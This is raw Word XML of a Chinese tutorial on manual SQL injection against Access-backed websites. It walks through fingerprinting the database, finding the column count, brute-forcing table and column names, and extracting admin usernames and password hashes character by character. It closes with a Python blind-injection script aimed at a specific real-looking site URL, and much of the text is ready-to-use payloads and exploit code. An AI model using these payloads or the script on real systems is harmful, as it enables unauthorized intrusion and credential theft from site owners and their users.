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Access数据库手工渗透思路过程（总）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1判断数据库类型</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>一、通过页面返回的报错信息，一般情况下页面报错会显示是什么数据库类型，在此不多说；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>二、通过各个数据库特有的数据表来判断：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>    1、mssql数据库</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>      http://127.0.0.1/test.php?id=1 and (select count(*) from sysobjects)&gt;0 and 1=1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>    2、access数据库</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>      http://127.0.0.1/test.php?id=1 and (select count(*) from msysobjects)&gt;0 and 1=1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>    3、mysql数据库(mysql版本在5.0以上)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16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:asciiTheme="majorEastAsia" w:hAnsiTheme="majorEastAsia" w:eastAsiaTheme="majorEastAsia" w:cstheme="majorEastAsia"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>http://127.0.0.1/test.php?id=1 and (select count(*) from</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:asciiTheme="majorEastAsia" w:hAnsiTheme="majorEastAsia" w:eastAsiaTheme="majorEastAsia" w:cstheme="majorEastAsia"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="1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6"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>information_schema.TABLES)&gt;0 and 1=1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Theme="majorEastAsia" w:hAnsiTheme="majorEastAsia" w:eastAsiaTheme="majorEastAsia" w:cstheme="majorEastAsia"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>Access和SQL Server都有自己的系统表，比如存放数据库中所有对象的表：Access是在系统表“msysobjects”中，但在Web环境下读该表会提示“没有权限”；SQL Server是在表“sysobjects”中，在Web环境下可正常读取。在确认可以注入的情况下，使用下面的语句：http://www.</w:t>
      </w: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xxx</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:asciiTheme="majorEastAsia" w:hAnsiTheme="majorEastAsia" w:eastAsiaTheme="majorEastAsia" w:cstheme="majorEastAsia"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>.com/</w:t>
      </w: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15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>.asp?ID=</w:t>
      </w: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15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t xml:space="preserve"> and(select count(*) from sysobjects)&gt;0如果数据库是Access，由于找不到表sysobjects，服务器错误提示。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>    4、oracle数据库</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>      http://127.0.0.1/test.php?id=1 and (select count(*) from sys.user_tables)&gt;0 and 1=1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>三、通过各数据库特有的连接符判断数据库类型：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>    1、mssql数据库</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>     http://127.0.0.1/test.php?id=1 and '1' + '1' = '11'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>    2、mysql数据库</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>     http://127.0.0.1/test.php?id=1 and '1' + '1' = '11'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>     http://127.0.0.1/test.php?id=1 and CONCAT('1','1')='11'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>    3、oracle数据库</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>     http://127.0.0.1/test.php?id=1 and '1'||'1'='11'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>     http://127.0.0.1/test.php?id=1 and CONCAT('1','1')='11'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access数据库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Fonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>http://127.0.0.1/test.php?id=1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’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逐一爆破字段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确定当前查询的列数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order by 22正确 order by 23错误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这就说明字段数目是22个</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:bidi w:val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3.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>猜解表名</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>由于Access数据库的系统表默认不可访问，故不能像Mysql数据库一样，通过注系统表来获得表名和列名。这也是Access数据库比较难注入的一个原因，只要表名、列名够变态，有注入点也很难注出结果。</w:t>
      </w:r>
    </w:p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3.1 方法1-系统表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当然，如果有系统表的话，直接注是最好的。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SELECT Name, NULL, NULL, NULL, NULL from MSysObjects WHERE Type=1</w:t>
      </w:r>
    </w:p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3.2 方法2-爆破法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AND (SELECT TOP 1 1 FROM TableNameToBruteforce[i])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在提交注入查询语句后，如果获得的HTML返回和正常页面一样，则表存在。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exists(select * from tablename)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>?ID=568 and(select count(*) from admin)&gt;=0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通过写脚本，用字典中的项逐一替换tablename，直到返回正确页面，即表示当前表名存在，下同。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AND (SELECT TOP 1 1 FROM TableNameToBruteforce[i])</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>3.表名猜完之后那就猜列（为了方便假设表名为admin）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猜列名：  语法：and (select count(字段名) from admin)&gt;0 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例：and (select count(username) from article_admin)&gt;0  返回了正常，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接着提交： and (select count(password) from article_admin)&gt;0  返回了正常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如果都返回正常那就说明存在username和password这两个字段名。（当然同样需要去猜，手工的就是比较麻烦）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>4.</w:t>
      </w:r>
      <w:r>
        <w:t>猜用户名和密码长度；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t>（一下的字段名都假设为username，password方便阐述。） </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t> and (select top 1 len(username) from article_admin)=5  返回正常，说明username内容长度为5（从1开始一直去尝试，知道返回页面错误为止。）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t> and (select top 1 len(password) from article_admin)=16  正常，password内容长度为16，也就是MD5的值。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rStyle w:val="9"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="9"/>
        </w:rPr>
        <w:t>  猜用户名和密码内容：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> and (select top 1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="0000FF"/>
        </w:rPr>
        <w:t>asc</w:t>
      </w:r>
      <w:r>
        <w:t>(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mid</w:t>
      </w:r>
      <w:r>
        <w:t>(username,1,1)) from article_admin)=97  返回了正常，说明第一username里的第一位内容是ASC码的97，也就是a。 </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val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ascii不行）</w:t>
      </w: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"https://www.cnblogs.com/_zjl/archive/2011/05/23/2054206.html" </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="8"/>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>access截取字符串，Left 函数，Right 函数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mid函数</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>猜第二位把username,1,1改成username,2,1就可以了。  猜密码把username改成password就OK了  同时附上以ASC表方便查阅。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36570" cy="4143375"/>
            <wp:effectExtent l="0" t="0" r="11430" b="190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一小段脚本，可方便操作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 coding=utf-8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binascii</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>from termcolor import *</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>import optparse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url='http://www.dongchong.net/about.asp?kind=cn&amp;title=a1'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>payloads='abcdefghigklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789@_.'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>response=requests.get(url)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>length = response.headers['content-length']</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>print (colored("true length: "+length,"green",attrs=["bold"])) #termcolor 绿 加粗</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>for i in range(1,3):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payload in payloads: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payload_url="' and (select top 1 asc(mid(password,{},1)) from admin)={} and '1'='1 ".format(i,ord(payload))  #ord 返回ascii码值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(payload)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response=requests.get(url+payload_url)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length_now = response.headers['content-length']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(colored("now length: "+length_now,"green",attrs=["bold"]))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length_now==length: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 (colored("result:"+payload,"yellow",attrs=["bold"]))</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>print (colored("over ---","green",attrs=["bold"]))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1FAF4"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="8761FAF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7F6803"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="507F6803"/>
    <w:lvl w:ilvl="0" w:tentative="0">
      <w:start w:val="4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2">
    <w:nsid w:val="782D3BF3"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="782D3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1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佳豪</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2019-05-29T09:41:33Z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